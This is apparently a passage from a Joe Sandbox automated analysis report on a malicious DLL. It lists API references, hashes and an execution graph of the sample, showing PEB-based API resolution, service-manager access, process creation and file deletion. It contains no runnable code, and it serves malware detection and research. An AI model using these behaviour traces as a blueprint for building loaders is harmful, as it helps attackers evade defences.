                                                                                                                                                                                      • Opcode Fuzzy Hash: bbc3aa02874f919a5562fc59bf0e93d19a0289ffcaaf288ffccd832525a6e6ad
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51A2726056069FDB168F91E450BBE73A8FF65318F30492EDA1557A90EB31E841CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9F2DEB
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 6E9F2DF2
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 6E9F2E2C
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 6E9F2E33
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                                                                      • Opcode ID: 93c15d6b6b0cf42dc3d6a26a55b7f32a4fe8baa83435e9fdc21af0d11b62ef36
                                                                                                                                                                                      • Instruction ID: aa4aca6d9a605c3eaa63a07a1eba400dcdb232c6f9d12dd8650245b809a5dda7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93c15d6b6b0cf42dc3d6a26a55b7f32a4fe8baa83435e9fdc21af0d11b62ef36
                                                                                                                                                                                      • Instruction Fuzzy Hash: F321C271604345EFDB50DFF6C890A9BB7BDEF813687208929E82897210D731EC428F91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6E9F4169
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9F41A1
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9F41C1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                                                                      • Opcode ID: 2eb714ab7b60499ed460677e72c941dc4bde1205716e76479124fe86f271dd96
                                                                                                                                                                                      • Instruction ID: e3e30b2e70a8a55f945e734971d41f902f8151f6551ccfe4e27e76d222d735b4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eb714ab7b60499ed460677e72c941dc4bde1205716e76479124fe86f271dd96
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811E1F1614A16FE670117F65D89CEF696CDFB62A83100825F401D2100EB74DD038FB1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000), ref: 6E9F7EBD
                                                                                                                                                                                      • GetLastError.KERNEL32(?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?,?,?,6E9F70CD,?), ref: 6E9F7EC9
                                                                                                                                                                                        • Part of subcall function 6E9F7E8F: CloseHandle.KERNEL32(FFFFFFFE,6E9F7ED9,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?,?), ref: 6E9F7E9F
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 6E9F7ED9
                                                                                                                                                                                        • Part of subcall function 6E9F7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E9F7E80,6E9F7844,?,?,6E9F6B46,?,?,00000000,?), ref: 6E9F7E64
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E9F7857,?,00000001,?,?,?,6E9F6B46,?,?,00000000,?), ref: 6E9F7EEE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                      • Opcode ID: dd9c94531d17c9aabc47d9c95ac52843ef7706f751a987b606ea415c5adf91ea
                                                                                                                                                                                      • Instruction ID: b0aea88c5000f548169e967b427263a421fe024fe0e2e7f9f0500202d91901e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd9c94531d17c9aabc47d9c95ac52843ef7706f751a987b606ea415c5adf91ea
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F0F836024618FBCF121ED1AC04EDA3F2AFF4A3A4B098411FA19A9560C732CC619B90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E9EFAC5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                      • Opcode ID: e9259afd95ecc2c92e8dd6f06ea136959e9fbe127d4e0c2a6fb1143f2c8e1751
                                                                                                                                                                                      • Instruction ID: 6c423a5a3dcaa4ebfb79b600927cc9e9c868f6b7ceb13c1ec4efc67adf3e0bed
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9259afd95ecc2c92e8dd6f06ea136959e9fbe127d4e0c2a6fb1143f2c8e1751
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0841677290010AEFCF02CF94D890AEE7BB9BF48308F28849AFA0966650D335D951DF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:5.7%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:59.3%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:430
                                                                                                                                                                                      Total number of Limit Nodes:44

                                                                                                                                                                                      Graph

                                                                                                                                                                                      execution_graph 21333 2829902 21366 282a564 21333->21366 21335 282ae1e 21470 281b12e GetPEB RtlAllocateHeap FindCloseChangeNotification CreateProcessW 21335->21470 21343 282ae52 21471 282c772 OpenServiceW GetPEB RtlAllocateHeap OpenSCManagerW 21343->21471 21344 28160ba GetPEB RtlAllocateHeap 21344->21366 21346 282ae1c 21357 281f699 GetPEB 21357->21366 21362 2828518 GetPEB RtlAllocateHeap 21362->21366 21366->21335 21366->21343 21366->21344 21366->21346 21366->21357 21366->21362 21367 2822eed GetPEB 21366->21367 21368 281f022 21366->21368 21372 2823abe 21366->21372 21385 28256a9 21366->21385 21395 282e7da 21366->21395 21403 282ba18 21366->21403 21414 281196d 21366->21414 21424 2818d59 21366->21424 21433 28289da 21366->21433 21444 2818112 21366->21444 21455 2824dc5 GetPEB RtlAllocateHeap 21366->21455 21456 2815dc3 GetPEB RtlAllocateHeap 21366->21456 21457 28327e2 GetPEB 21366->21457 21458 2830bf1 GetPEB RtlAllocateHeap 21366->21458 21459 281635f GetPEB 21366->21459 21460 28337b6 GetPEB 21366->21460 21461 2826b91 GetPEB RtlAllocateHeap 21366->21461 21462 2832d4f OpenServiceW GetPEB OpenSCManagerW 21366->21462 21463 2812176 GetPEB RtlAllocateHeap 21366->21463 21464 2811df9 GetPEB FindCloseChangeNotification 21366->21464 21465 28139c3 CreateFileW GetPEB RtlAllocateHeap FindCloseChangeNotification CreateProcessW 21366->21465 21466 2824268 GetPEB 21366->21466 21467 282ce94 GetPEB 21366->21467 21468 282c145 GetPEB 21366->21468 21469 282aeae GetPEB RtlAllocateHeap 21366->21469 21367->21366 21369 281f03c 21368->21369 21370 281f14a 21369->21370 21371 2812b7c LoadLibraryW GetPEB RtlAllocateHeap 21369->21371 21370->21366 21371->21369 21374 2823ffe 21372->21374 21376 2824243 21374->21376 21381 2824241 21374->21381 21472 2823130 21374->21472 21485 281e259 21374->21485 21489 2817cc1 GetPEB 21374->21489 21490 282e606 GetPEB 21374->21490 21491 2830ad3 21374->21491 21495 282b062 GetPEB 21374->21495 21496 2822eed 21374->21496 21500 2833231 21374->21500 21504 2817cc1 GetPEB 21376->21504 21381->21366 21388 282594a 21385->21388 21387 281e259 GetPEB 21387->21388 21388->21387 21390 2833231 2 API calls 21388->21390 21391 2825a74 21388->21391 21392 2826f53 2 API calls 21388->21392 21394 2825a72 21388->21394 21544 2817cc1 GetPEB 21388->21544 21545 2831987 GetPEB 21388->21545 21390->21388 21546 28124aa GetPEB 21391->21546 21392->21388 21394->21366 21397 282eb52 21395->21397 21402 282eb92 21397->21402 21547 2822d06 21397->21547 21551 282eccd 21397->21551 21555 2829038 21397->21555 21559 281921f GetPEB 21397->21559 21560 28124aa GetPEB 21397->21560 21402->21366 21561 2818cbc 21403->21561 21405 2830ad3 GetPEB RtlAllocateHeap 21406 282bda8 21405->21406 21406->21405 21407 282bdd7 21406->21407 21410 282bdf4 21406->21410 21411 2822eed GetPEB 21406->21411 21578 281c52a GetPEB 21406->21578 21579 2818c65 GetPEB 21406->21579 21580 28306a6 GetPEB 21406->21580 21564 282604e 21407->21564 21410->21366 21411->21406 21420 2811c4c 21414->21420 21415 281f699 GetPEB 21415->21420 21417 2811dd8 21608 2820969 GetPEB 21417->21608 21418 2811dd6 21418->21366 21420->21415 21420->21417 21420->21418 21601 2815b78 21420->21601 21605 2816617 GetPEB 21420->21605 21606 281a8e8 GetPEB RtlAllocateHeap 21420->21606 21607 2822c0a GetPEB 21420->21607 21430 2818ff3 21424->21430 21427 2819106 21427->21366 21428 2830ad3 2 API calls 21428->21430 21429 282604e GetPEB 21429->21430 21430->21427 21430->21428 21430->21429 21432 2822eed GetPEB 21430->21432 21609 281aeb9 21430->21609 21619 28306a6 GetPEB 21430->21619 21620 28124aa GetPEB 21430->21620 21432->21430 21442 2828e22 21433->21442 21434 282900b 21436 2829038 2 API calls 21434->21436 21437 2829009 21436->21437 21437->21366 21438 2822d06 2 API calls 21438->21442 21439 2830ad3 2 API calls 21439->21442 21442->21434 21442->21437 21442->21438 21442->21439 21443 2822eed GetPEB 21442->21443 21632 281890e 21442->21632 21636 28306a6 GetPEB 21442->21636 21637 281921f GetPEB 21442->21637 21443->21442 21451 281858e 21444->21451 21445 281f699 GetPEB 21445->21451 21446 281872b 21643 2812cf9 GetPEB 21446->21643 21448 2818729 21448->21366 21449 2830ad3 2 API calls 21449->21451 21451->21445 21451->21446 21451->21448 21451->21449 21452 2826f53 GetPEB RtlAllocateHeap 21451->21452 21454 2822eed GetPEB 21451->21454 21638 28192dd 21451->21638 21642 2821270 GetPEB 21451->21642 21452->21451 21454->21451 21455->21366 21456->21366 21457->21366 21458->21366 21459->21366 21460->21366 21461->21366 21462->21366 21463->21366 21464->21366 21465->21366 21466->21366 21467->21366 21468->21366 21469->21366 21470->21346 21471->21346 21479 282315f 21472->21479 21473 281f699 GetPEB 21473->21479 21475 2826f53 GetPEB RtlAllocateHeap 21475->21479 21476 28236f9 21476->21374 21479->21473 21479->21475 21479->21476 21481 28236dc 21479->21481 21505 281c38f 21479->21505 21515 2832398 GetPEB 21479->21515 21516 281c52a GetPEB 21479->21516 21517 2831bb6 GetPEB 21479->21517 21518 2817cc1 GetPEB 21479->21518 21519 28153d6 GetPEB 21479->21519 21509 281f699 21481->21509 21486 281e27f 21485->21486 21487 282e399 GetPEB 21486->21487 21488 281e323 21487->21488 21488->21374 21489->21374 21490->21374 21492 2830ae6 21491->21492 21535 2826f53 21492->21535 21494 2830b76 21494->21374 21494->21494 21495->21374 21497 2822f00 21496->21497 21498 281f699 GetPEB 21497->21498 21499 2822f85 21498->21499 21499->21374 21501 283324a 21500->21501 21502 282e399 GetPEB 21501->21502 21503 28332f7 OpenSCManagerW 21502->21503 21503->21374 21504->21381 21506 281c3a8 21505->21506 21520 282e399 21506->21520 21510 281f6b3 21509->21510 21528 281f5e0 21510->21528 21515->21479 21516->21479 21517->21479 21518->21479 21519->21479 21521 282e43d 21520->21521 21525 281c44f OpenServiceW 21520->21525 21526 28189e3 GetPEB 21521->21526 21523 282e450 21527 28166c3 GetPEB 21523->21527 21525->21479 21526->21523 21527->21525 21529 282e399 GetPEB 21528->21529 21530 281f690 21529->21530 21531 281c460 21530->21531 21532 281c47b 21531->21532 21533 282e399 GetPEB 21532->21533 21534 281c519 21533->21534 21534->21476 21536 281f5e0 GetPEB 21535->21536 21537 2827020 21536->21537 21540 2824cfd 21537->21540 21539 2827037 21539->21494 21541 2824d1c 21540->21541 21542 282e399 GetPEB 21541->21542 21543 2824db4 RtlAllocateHeap 21542->21543 21543->21539 21544->21388 21545->21388 21546->21394 21548 2822d36 21547->21548 21549 282e399 GetPEB 21548->21549 21550 2822dcf CreateFileW 21549->21550 21550->21397 21552 282ecef 21551->21552 21553 282e399 GetPEB 21552->21553 21554 282ed83 21553->21554 21554->21397 21556 282904b 21555->21556 21557 282e399 GetPEB 21556->21557 21558 28290f4 FindCloseChangeNotification 21557->21558 21558->21397 21559->21397 21560->21397 21562 282e399 GetPEB 21561->21562 21563 2818d50 21562->21563 21563->21406 21565 282606b 21564->21565 21581 2813965 21565->21581 21568 2813965 GetPEB 21569 2826307 21568->21569 21570 2813965 GetPEB 21569->21570 21571 2826320 21570->21571 21585 281e112 21571->21585 21574 281e112 GetPEB 21575 282634c 21574->21575 21589 282828a 21575->21589 21578->21406 21579->21406 21580->21406 21582 281397d 21581->21582 21593 2815821 21582->21593 21586 281e129 21585->21586 21587 282e399 GetPEB 21586->21587 21588 281e1dc 21587->21588 21588->21574 21590 282829d 21589->21590 21591 282e399 GetPEB 21590->21591 21592 2826385 21591->21592 21592->21410 21594 281583c 21593->21594 21597 28244f4 21594->21597 21598 282450e 21597->21598 21599 282e399 GetPEB 21598->21599 21600 28139bc 21599->21600 21600->21568 21602 2815b92 21601->21602 21603 282e399 GetPEB 21602->21603 21604 2815c36 21603->21604 21604->21420 21605->21420 21606->21420 21607->21420 21608->21418 21610 281aed3 21609->21610 21611 2830ad3 2 API calls 21610->21611 21612 281b013 21611->21612 21621 2828804 21612->21621 21615 2822eed GetPEB 21616 281b03e 21615->21616 21625 28155c0 21616->21625 21618 281b04f 21618->21430 21619->21430 21620->21430 21622 2828825 21621->21622 21629 281dfb1 21622->21629 21626 28155d3 21625->21626 21627 282e399 GetPEB 21626->21627 21628 2815674 DeleteFileW 21627->21628 21628->21618 21630 282e399 GetPEB 21629->21630 21631 281b02f 21630->21631 21631->21615 21633 2818931 21632->21633 21634 282e399 GetPEB 21633->21634 21635 28189d2 SetFileInformationByHandle 21634->21635 21635->21442 21636->21442 21637->21442 21639 2819302 21638->21639 21640 282e399 GetPEB 21639->21640 21641 281937c 21640->21641 21641->21451 21642->21451 21643->21448 21644 6e9f16b6 21659 6e9f3c92 21644->21659 21649 6e9f16de 21687 6e9f170f 29 API calls 3 library calls 21649->21687 21650 6e9f16d2 21686 6e9f2c83 14 API calls __dosmaperr 21650->21686 21653 6e9f16d8 21654 6e9f16e5 21688 6e9f2c83 14 API calls __dosmaperr 21654->21688 21656 6e9f1702 21689 6e9f2c83 14 API calls __dosmaperr 21656->21689 21658 6e9f1708 21660 6e9f3c9b 21659->21660 21664 6e9f16c7 21659->21664 21690 6e9f275c 70 API calls 3 library calls 21660->21690 21662 6e9f3cbe 21691 6e9f3a9d 78 API calls 3 library calls 21662->21691 21665 6e9f4161 GetEnvironmentStringsW 21664->21665 21666 6e9f4179 21665->21666 21671 6e9f16cc 21665->21671 21692 6e9f4073 21666->21692 21668 6e9f4196 21669 6e9f41ab 21668->21669 21670 6e9f41a0 FreeEnvironmentStringsW 21668->21670 21695 6e9f22e9 21669->21695 21670->21671 21671->21649 21671->21650 21674 6e9f41cb 21677 6e9f4073 __CreateFrameInfo WideCharToMultiByte 21674->21677 21675 6e9f41ba 21702 6e9f2c83 14 API calls __dosmaperr 21675->21702 21679 6e9f41db 21677->21679 21678 6e9f41bf FreeEnvironmentStringsW 21678->21671 21680 6e9f41ea 21679->21680 21681 6e9f41e2 21679->21681 21704 6e9f2c83 14 API calls __dosmaperr 21680->21704 21703 6e9f2c83 14 API calls __dosmaperr 21681->21703 21684 6e9f41e8 FreeEnvironmentStringsW 21684->21671 21686->21653 21687->21654 21688->21656 21689->21658 21690->21662 21691->21664 21694 6e9f408a WideCharToMultiByte 21692->21694 21694->21668 21696 6e9f2327 21695->21696 21700 6e9f22f7 _unexpected 21695->21700 21706 6e9f1fcf 14 API calls __dosmaperr 21696->21706 21697 6e9f2312 RtlAllocateHeap 21699 6e9f2325 21697->21699 21697->21700 21699->21674 21699->21675 21700->21696 21700->21697 21705 6e9f0e8e EnterCriticalSection LeaveCriticalSection _unexpected 21700->21705 21702->21678 21703->21684 21704->21684 21705->21700 21706->21699 21707 6e9dc2a0 GetModuleHandleA 21708 6e9dc2bc 21707->21708 21709 6e9dc2af GetProcAddress 21707->21709 21713 6e9d10a0 21714 6e9d10e8 HeapAlloc 21713->21714 21715 6e9d10d6 GetProcessHeap 21713->21715 21717 6e9d10fa 21714->21717 21724 6e9d1231 __DllMainCRTStartup@12 21714->21724 21716 6e9d10e3 21715->21716 21715->21724 21716->21714 21718 6e9d111f GetProcessHeap 21717->21718 21719 6e9d1131 HeapAlloc 21717->21719 21720 6e9d112c 21718->21720 21718->21724 21723 6e9d1143 __DllMainCRTStartup@12 21719->21723 21719->21724 21720->21719 21722 6e9d11db 21733 6e9ebe30 21722->21733 21723->21722 21723->21724 21738 6e9f9280 HeapReAlloc GetProcessHeap HeapAlloc __DllMainCRTStartup@12 21723->21738 21739 6e9d1000 HeapFree 21724->21739 21725 6e9d1272 21740 6e9d1000 HeapFree 21725->21740 21728 6e9d11f7 21731 6e9d1210 HeapFree 21728->21731 21732 6e9d1200 HeapFree 21728->21732 21730 6e9d127f 21732->21731 21734 6e9ebe3f __DllMainCRTStartup@12 21733->21734 21735 6e9ebe59 21734->21735 21741 2815314 21734->21741 21735->21728 21738->21723 21739->21725 21740->21730 21742 28153c0 21741->21742 21745 281f3f7 21742->21745 21744 28153d0 21744->21728 21746 282e399 GetPEB 21745->21746 21747 281f49a ExitProcess 21746->21747 21747->21744 21748 281567f 21749 2815739 21748->21749 21753 2815760 21748->21753 21754 282ed95 21749->21754 21752 281f3f7 2 API calls 21752->21753 21763 282f32b 21754->21763 21755 282f52b 21771 28306ef 21755->21771 21756 2813965 GetPEB 21756->21763 21758 281574c 21758->21752 21758->21753 21760 281e259 GetPEB 21760->21763 21763->21755 21763->21756 21763->21758 21763->21760 21764 2830ad3 GetPEB RtlAllocateHeap 21763->21764 21766 2822eed GetPEB 21763->21766 21767 2820207 21763->21767 21781 2816617 GetPEB 21763->21781 21782 28124aa GetPEB 21763->21782 21783 28306a6 GetPEB 21763->21783 21764->21763 21766->21763 21768 2820224 21767->21768 21769 282e399 GetPEB 21768->21769 21770 28202da lstrcmpiW 21769->21770 21770->21763 21772 283071d 21771->21772 21773 2813965 GetPEB 21772->21773 21774 283098a 21773->21774 21784 2829100 21774->21784 21776 28309d2 21776->21758 21777 28309c7 21777->21776 21778 2829038 2 API calls 21777->21778 21779 28309ef 21778->21779 21780 2829038 2 API calls 21779->21780 21780->21776 21781->21763 21782->21763 21783->21763 21785 282913f 21784->21785 21786 282e399 GetPEB 21785->21786 21787 28291da CreateProcessW 21786->21787 21787->21777 21788 6e9ec781 21789 6e9ec7bf 21788->21789 21790 6e9ec78c 21788->21790 21816 6e9ec8db 107 API calls 4 library calls 21789->21816 21792 6e9ec7b1 21790->21792 21793 6e9ec791 21790->21793 21800 6e9ec7d4 21792->21800 21795 6e9ec796 21793->21795 21796 6e9ec7a7 21793->21796 21799 6e9ec79b 21795->21799 21814 6e9ecfbc 21 API calls 21795->21814 21815 6e9ecf9d 23 API calls 21796->21815 21801 6e9ec7e0 CallCatchBlock 21800->21801 21817 6e9ed02d 21801->21817 21803 6e9ec7e7 __DllMainCRTStartup@12 21804 6e9ec80e 21803->21804 21805 6e9ec8d3 21803->21805 21811 6e9ec84a ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 21803->21811 21825 6e9ecf8f 21804->21825 21833 6e9ed1cc IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 21805->21833 21808 6e9ec8da 21809 6e9ec81d __RTC_Initialize 21809->21811 21828 6e9ecead InitializeSListHead 21809->21828 21811->21799 21812 6e9ec82b 21812->21811 21829 6e9ecf64 21812->21829 21814->21799 21815->21799 21816->21799 21818 6e9ed036 21817->21818 21834 6e9ecc44 IsProcessorFeaturePresent 21818->21834 21820 6e9ed042 21835 6e9ef0dd 10 API calls 2 library calls 21820->21835 21822 6e9ed047 21824 6e9ed04b 21822->21824 21836 6e9ef112 7 API calls 2 library calls 21822->21836 21824->21803 21837 6e9ed066 21825->21837 21827 6e9ecf96 21827->21809 21828->21812 21830 6e9ecf69 ___scrt_release_startup_lock 21829->21830 21832 6e9ecf72 21830->21832 21844 6e9ecc44 IsProcessorFeaturePresent 21830->21844 21832->21811 21833->21808 21834->21820 21835->21822 21836->21824 21838 6e9ed076 21837->21838 21839 6e9ed072 21837->21839 21842 6e9ed083 ___scrt_release_startup_lock 21838->21842 21843 6e9ed1cc IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 21838->21843 21839->21827 21841 6e9ed0ec 21842->21827 21843->21841 21844->21832 21845 6e9ecac1 21846 6e9ecacf 21845->21846 21847 6e9ecaca 21845->21847 21851 6e9ec98b 21846->21851 21866 6e9ece62 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 21847->21866 21852 6e9ec997 CallCatchBlock 21851->21852 21853 6e9ec9c0 dllmain_raw 21852->21853 21854 6e9ec9bb 21852->21854 21862 6e9ec9a6 21852->21862 21855 6e9ec9da dllmain_crt_dispatch 21853->21855 21853->21862 21867 6e9d1290 21854->21867 21855->21854 21855->21862 21857 6e9ec9fb 21858 6e9eca2c 21857->21858 21861 6e9d1290 __DllMainCRTStartup@12 38 API calls 21857->21861 21859 6e9eca35 dllmain_crt_dispatch 21858->21859 21858->21862 21860 6e9eca48 dllmain_raw 21859->21860 21859->21862 21860->21862 21863 6e9eca13 21861->21863 21881 6e9ec8db 107 API calls 4 library calls 21863->21881 21865 6e9eca21 dllmain_raw 21865->21858 21866->21846 21868 6e9d143c 21867->21868 21869 6e9d12d2 21867->21869 21868->21857 21882 6e9ebe60 21869->21882 21872 6e9d1345 HeapAlloc 21874 6e9d144f __DllMainCRTStartup@12 21872->21874 21878 6e9d135a __DllMainCRTStartup@12 21872->21878 21873 6e9d1333 GetProcessHeap 21873->21874 21875 6e9d1340 21873->21875 21910 6e9d1000 HeapFree 21874->21910 21875->21872 21877 6e9d1476 21877->21857 21895 6e9ec050 21878->21895 21880 6e9d142a HeapFree 21880->21868 21881->21865 21911 6e9ec510 GetTickCount64 21882->21911 21884 6e9ebe77 21885 6e9ec510 __DllMainCRTStartup@12 GetTickCount64 21884->21885 21886 6e9ebe86 21885->21886 21887 6e9ebe96 GetTickCount64 21886->21887 21887->21887 21888 6e9ebeaf 21887->21888 21889 6e9ebeb4 GetTickCount64 21888->21889 21889->21889 21890 6e9ebecd GetTickCount64 GetTickCount64 21889->21890 21891 6e9ebed6 GetTickCount64 21890->21891 21891->21891 21892 6e9ebeef 21891->21892 21893 6e9ebef4 GetTickCount64 21892->21893 21893->21893 21894 6e9d12f6 21893->21894 21894->21872 21894->21873 21913 6e9ec70e 21895->21913 21897 6e9ec074 GetPEB 21900 6e9ec0ce CreateFileA GetLastError VirtualAlloc 21897->21900 21902 6e9ec258 __DllMainCRTStartup@12 21900->21902 21901 6e9ec4cb 21925 6e9ec717 5 API calls ___raise_securityfailure 21901->21925 21902->21901 21905 6e9ec492 21902->21905 21904 6e9ec4e7 21904->21880 21906 6e9ec49e 21905->21906 21923 6e9ebfe0 GetPEB GetPEB 21905->21923 21924 6e9ec717 5 API calls ___raise_securityfailure 21906->21924 21909 6e9ec4c7 21909->21880 21910->21877 21912 6e9ec578 21911->21912 21912->21884 21915 6e9ecaf2 21913->21915 21916 6e9ecb11 21915->21916 21919 6e9ecb13 __DllMainCRTStartup@12 21915->21919 21926 6e9f0e8e EnterCriticalSection LeaveCriticalSection _unexpected 21915->21926 21927 6e9f0f17 15 API calls 2 library calls 21915->21927 21916->21897 21918 6e9ed489 __DllMainCRTStartup@12 21929 6e9ee95c RaiseException 21918->21929 21919->21918 21928 6e9ee95c RaiseException 21919->21928 21922 6e9ed4a6 21922->21897 21923->21906 21924->21909 21925->21904 21926->21915 21927->21915 21928->21918 21929->21922

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
